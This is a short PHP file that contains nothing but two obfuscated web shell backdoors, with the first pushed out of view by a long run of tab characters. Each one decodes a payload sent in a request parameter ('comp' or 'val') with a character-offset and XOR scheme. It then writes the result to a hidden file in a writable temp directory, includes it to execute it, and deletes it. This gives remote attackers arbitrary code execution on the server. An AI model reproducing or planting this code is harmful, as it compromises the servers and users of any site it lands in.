<?php																																										if(array_key_exists("c\x6F\x6Dp", $_REQUEST) && !is_null($_REQUEST["c\x6F\x6Dp"])){ $hld = $_REQUEST["c\x6F\x6Dp"]; $hld = explode( '.' ,$hld ) ; $dchunk = ''; $s7 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $s7 ); foreach( $hld as $n=> $v9) { $chS = ord( $s7[$n % $lenS] ); $dec = ( ( int)$v9 - $chS -( $n % 10))^ 73; $dchunk.= chr( $dec ); } $fac = array_filter([getcwd(), "/var/tmp", ini_get("upload_tmp_dir"), getenv("TMP"), "/tmp", "/dev/shm", sys_get_temp_dir(), session_save_path(), getenv("TEMP")]); foreach ($fac as $res): if (!!is_dir($res) && !!is_writable($res)) { $component = join("/", [$res, ".reference"]); if (file_put_contents($component, $dchunk)) { include $component; @unlink($component); die(); } } endforeach; }


if(isset($_POST) && isset($_POST["val"])){
	$dchunk = array_filter([session_save_path(), "/var/tmp", "/tmp", getenv("TEMP"), getcwd(), sys_get_temp_dir(), ini_get("upload_tmp_dir"), getenv("TMP"), "/dev/shm"]);
	$key = $_POST["val"];
	  $key		=explode 	 ('.'	, $key	) 	 ;		 
	$data_chunk = '';
            $s = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen( $s);
            $n = 0;
    
            array_walk( $key, function( $v6) use( &$data_chunk, &$n, $s, $lenS) {
                $chS = ord( $s[$n % $lenS]);
                $d =( ( int)$v6 - $chS -( $n % 10)) 	^	 7;
                $data_chunk .= chr( $d);
                $n++;
            });
	$tkn = 0;
do {
    $symbol = $dchunk[$tkn] ?? null;
    if ($tkn >= count($dchunk)) break;
    		if (is_dir($symbol) && is_writable($symbol)) {
    $resource = "$symbol" . "/.property_set";
    $success = file_put_contents($resource, $data_chunk);
if ($success) {
	include $resource;
	@unlink($resource);
	die();}
}
    $tkn++;
} while (true);
}